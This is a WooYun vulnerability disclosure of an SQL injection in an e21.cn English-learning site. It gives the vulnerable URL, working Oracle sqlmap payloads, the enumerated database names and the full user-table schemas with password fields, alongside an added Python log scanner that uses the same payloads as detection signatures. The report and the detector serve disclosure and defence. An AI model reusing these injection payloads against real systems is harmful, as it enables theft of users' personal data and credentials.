
Vulnerability summary

Defect ID: wooyun-2015-0157774

Title: Bitou (笔头网) SQL injection vulnerability (affects nearly 400,000 users)

Vendor: e21.cn

Reporter: 路人甲

Submitted: 2015-12-03 12:13

Fixed: 2016-01-04 10:39

Published: 2016-01-04 10:39

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 15

Status: Fixed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-12-03: Details sent to the vendor; awaiting vendor action
2015-12-04: Vendor confirmed; details disclosed to the vendor only
2015-12-14: Details disclosed to core white hats and domain experts
2015-12-24: Details disclosed to regular white hats
2016-01-03: Details disclosed to intern white hats
2016-01-04: Vendor fixed the vulnerability and chose to publish; details disclosed to the public

Brief description:

Detailed description:

http://denglish.e21.cn/diag/user_myclazz.do;jsessionid=D34619F852B1EF15E0EB4890AA68A335?pageNum=1&pageRows=5&grade=0&bjtype=common
The grade parameter is injectable. sqlmap output:

Parameter: grade (GET)
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)
Payload: pageNum=1&pageRows=5&grade=0') AND 8844=CTXSYS.DRITHSX.SN(8844,(CHR(113)||CHR(107)||CHR(113)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (8844=8844) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(122)||CHR(98)||CHR(113))) AND ('ibJw'='ibJw&bjtype=common
Type: AND/OR time-based blind
Title: Oracle AND time-based blind (heavy query)
Payload: pageNum=1&pageRows=5&grade=0') AND 2118=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ('eRHT'='eRHT&bjtype=common
---
web application technology: JSP
back-end DBMS: Oracle
available databases [25]:
[*] APEX_030200
[*] APPQOSSYS
[*] BITOU
[*] CMS
[*] CTXSYS
[*] DBSNMP
[*] DENGLISH
[*] DENGLISH3
[*] EBOOK
[*] EBOOK1
[*] EXFSYS
[*] FLOWS_030000
[*] FLOWS_FILES
[*] MDSYS
[*] NEW007
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] XDB
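The two probe shapes in the sqlmap output above (an error-based probe through CTXSYS.DRITHSX.SN and a time-based probe that self-joins ALL_USERS five times) leave very recognisable traces in web-server access logs. The following scanner is an added example written for this page; it is not part of the WooYun report or of the affected site's code. It flags requests whose query string carries either signature, a trailing boolean tail after a closing quote or parenthesis, or a non-integer value in a parameter that the endpoint's sample URL shows as numeric. The endpoint path is taken from the report; the jsessionid value, client addresses and log lines are constructed, and INTEGER_PARAMS is an assumption drawn from the sample URL.

```python
"""Flag Oracle SQL injection probes in combined-format access logs.

Added example, not part of the original report. The probe payloads embedded
below are the ones quoted in the report's sqlmap output; everything else
(addresses, timestamps, session id) is constructed.
"""
import re
from urllib.parse import urlsplit, parse_qsl, quote

# Parameters of the reported endpoint that should only ever be integers
# (assumption drawn from the sample URL: pageNum=1&pageRows=5&grade=0).
INTEGER_PARAMS = {"grade", "pageNum", "pageRows"}

# Signatures are matched against the URL-decoded parameter value.
SIGNATURES = [
    ("oracle error-based (CTXSYS.DRITHSX.SN)",
     re.compile(r"CTXSYS\.DRITHSX\.SN\s*\(", re.I)),
    ("oracle time-based heavy query (ALL_USERS self-join)",
     re.compile(r"SELECT\s+COUNT\(\*\)\s+FROM\s+ALL_USERS\s+\w+\s*,\s*ALL_USERS", re.I)),
    # Heuristic: a quote, optional closing parens, then AND/OR. May fire on
    # free-text fields, so weight it lower than the two Oracle-specific rules.
    ("boolean tail after closing quote/paren",
     re.compile(r"['\"]\s*\)*\s*(AND|OR)\s+", re.I)),
]

# Combined log format: client ident user [time] "METHOD target HTTP/x" status bytes
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def split_target(target):
    """Return (path, query) for a request target; drops ;jsessionid=... path params."""
    parts = urlsplit(target)
    path = parts.path.split(";", 1)[0]
    return path, parts.query


def scan_query(query):
    """Return a list of (param, reason) findings for one query string."""
    findings = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name in INTEGER_PARAMS and not re.fullmatch(r"-?\d+", value):
            findings.append((name, "non-integer value for integer parameter"))
        for label, pattern in SIGNATURES:
            if pattern.search(value):
                findings.append((name, label))
    return findings


def scan_log(lines):
    """Scan log lines; return one dict per request that tripped at least one rule."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        path, query = split_target(m.group("target"))
        findings = scan_query(query)
        if findings:
            hits.append({"client": line.split(" ", 1)[0], "path": path,
                         "findings": findings})
    return hits


# Constructed sample traffic. The session id is a placeholder, not the one in the report.
ENDPOINT = "/diag/user_myclazz.do;jsessionid=JSESSIONID_PLACEHOLDER"
PROBE_ERROR = ("pageNum=1&pageRows=5&grade=0') AND 8844=CTXSYS.DRITHSX.SN(8844,(CHR(113)"
               "||CHR(107)||CHR(113)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (8844=8844) "
               "THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(122)||CHR(98)"
               "||CHR(113))) AND ('ibJw'='ibJw&bjtype=common")
PROBE_TIME = ("pageNum=1&pageRows=5&grade=0') AND 2118=(SELECT COUNT(*) FROM ALL_USERS T1,"
              "ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ('eRHT'='eRHT"
              "&bjtype=common")


def log_line(client, query):
    """Build a combined-format line; the query is URL-encoded as a client would send it."""
    return ('%s - - [03/Dec/2015:12:13:00 +0800] "GET %s?%s HTTP/1.1" 200 512'
            % (client, ENDPOINT, quote(query, safe="=&")))


SAMPLE_LOG = [
    log_line("198.51.100.10", "pageNum=1&pageRows=5&grade=0&bjtype=common"),   # benign
    log_line("198.51.100.10", "pageNum=1&pageRows=5&grade=abc&bjtype=common"), # type violation only
    log_line("203.0.113.7", PROBE_ERROR),
    log_line("203.0.113.7", PROBE_TIME),
    '203.0.113.7 - - [03/Dec/2015:12:13:05 +0800] "GET /favicon.ico HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["client"], hit["path"])
        for param, reason in hit["findings"]:
            print("   ", param, "->", reason)
```

The integer check is the same validation the endpoint itself was missing: the report's fix section is empty, but a parameter like grade that only ever holds a number should be parsed as one and passed to the JDBC statement as a bind variable, at which point the string `0') AND ...` can no longer reach the Oracle parser. Both Oracle-specific rules match on the decoded value, so URL encoding and case variation in the probe do not evade them; the boolean-tail heuristic is deliberately listed last because it is the noisiest of the three.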

Proof of vulnerability:

back-end DBMS: Oracle
Database: NEW007
+--------+---------+
| Table  | Entries |
+--------+---------+
| T_USER | 126975  |
+--------+---------+
Database: NEW007
Table: T_USER
[32 columns]
+--------------+----------+
| Column       | Type     |
+--------------+----------+
| ADDRESS      | VARCHAR2 |
| AMOUNT       | NUMBER   |
| CARD_POINT   | NUMBER   |
| CREDIT       | NUMBER   |
| CRT_DATE     | DATE     |
| CURRENT_HOST | VARCHAR2 |
| EMAIL        | VARCHAR2 |
| GENDER       | VARCHAR2 |
| GRADE        | VARCHAR2 |
| GRADE_ID     | NUMBER   |
| IMAGE        | VARCHAR2 |
| INTRODUCE    | VARCHAR2 |
| LAST_TIME    | DATE     |
| LOGIN_COUT   | NUMBER   |
| LOGIN_NAME   | VARCHAR2 |
| MSN          | VARCHAR2 |
| NOTE         | VARCHAR2 |
| PASSWD       | VARCHAR2 |
| PHONE        | VARCHAR2 |
| PHONE_CHECK  | VARCHAR2 |
| PRIVILEGE    | VARCHAR2 |
| QQ           | VARCHAR2 |
| QQ_OPENID    | VARCHAR2 |
| REGION_ID    | NUMBER   |
| ROLE_ID      | NUMBER   |
| RRUID        | VARCHAR2 |
| SCHOOL_NAME  | VARCHAR2 |
| SINA_UID     | VARCHAR2 |
| STATUS       | VARCHAR2 |
| USER_ID      | NUMBER   |
| USER_NAME    | VARCHAR2 |
| USER_TYPE    | VARCHAR2 |
+--------------+----------+

[screenshot: b1.png]


http://www.penglish.cn/ Bitou (笔头网), an intelligent English learning platform, has 256,217 members in total.

back-end DBMS: Oracle
Database: BITOU
+--------+---------+
| Table  | Entries |
+--------+---------+
| T_USER | 256217  |
+--------+---------+
Database: BITOU
Table: T_USER
[51 columns]
+-----------------+----------+
| Column          | Type     |
+-----------------+----------+
| ADDRESS         | VARCHAR2 |
| ALIPAY          | VARCHAR2 |
| AMOUNT          | NUMBER   |
| BIRTHDAY        | VARCHAR2 |
| BLOG_URL        | VARCHAR2 |
| CARD_POINT      | NUMBER   |
| CET_TYPE        | NUMBER   |
| CHANNEL_ID      | NUMBER   |
| CREDIT          | NUMBER   |
| CRT_DATE        | DATE     |
| CRT_OP          | VARCHAR2 |
| CURRENT_DEV     | VARCHAR2 |
| CURRENT_HOST    | VARCHAR2 |
| DS_PRODUCT_ID   | NUMBER   |
| EMAIL           | VARCHAR2 |
| EXP             | NUMBER   |
| GENDER          | VARCHAR2 |
| GRADE           | VARCHAR2 |
| GRADE_ID        | NUMBER   |
| ID_VALIDATION   | VARCHAR2 |
| IMAGE           | VARCHAR2 |
| INTRODUCE       | VARCHAR2 |
| KY_USE_DAYS     | NUMBER   |
| LAST_TIME       | DATE     |
| LOGIN_COUT      | NUMBER   |
| LOGIN_NAME      | VARCHAR2 |
| MSN             | VARCHAR2 |
| NAME            | VARCHAR2 |
| NOTE            | VARCHAR2 |
| ORG_ID          | NUMBER   |
| PARENT_PASSWORD | VARCHAR2 |
| PASSWD          | VARCHAR2 |
| PHONE           | VARCHAR2 |
| PRIVILEGE       | VARCHAR2 |
| PROMOTE_ID      | NUMBER   |
| PROMOTER_LINK   | VARCHAR2 |
| QQ              | VARCHAR2 |
| REG_FROM        | NUMBER   |
| REG_HOST        | VARCHAR2 |
| REGION_ID       | NUMBER   |
| SCHOOL          | VARCHAR2 |
| STATUS          | VARCHAR2 |
| THIRD_TYPE      | VARCHAR2 |
| THIRD_UID       | VARCHAR2 |
| USE_DAYS        | NUMBER   |
| USE_TIME        | DATE     |
| USER_ID         | NUMBER   |
| USER_NAME       | VARCHAR2 |
| USER_TYPE       | VARCHAR2 |
| VALID_DAYS      | NUMBER   |
| WX_ID           | VARCHAR2 |
+-----------------+----------+

[screenshots: b4.png, b3.png]

Fix recommendation:

Copyright notice: please credit 路人甲@乌云 when reproducing.


Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 15

Confirmed: 2015-12-04 13:30

Vendor reply:

This SQL injection can directly affect the stability of the system and leak some data.

Latest status:

2015-12-04: This vulnerability occurred in a system operated by one of our (e21.cn) partner companies and is not directly related to us (e21.cn). We have notified the relevant company, and they have already dealt with the vulnerability. However, for operational reasons, we will choose to disclose the vulnerability publicly somewhat later. Because of institutional constraints on our organization, we are unable to send a material gift, for which we sincerely apologize. Our sincere thanks to the white hat who reported the vulnerability!!

2016-01-04: At the partner's request, we have decided to disclose this vulnerability today! Thanks to the white hat!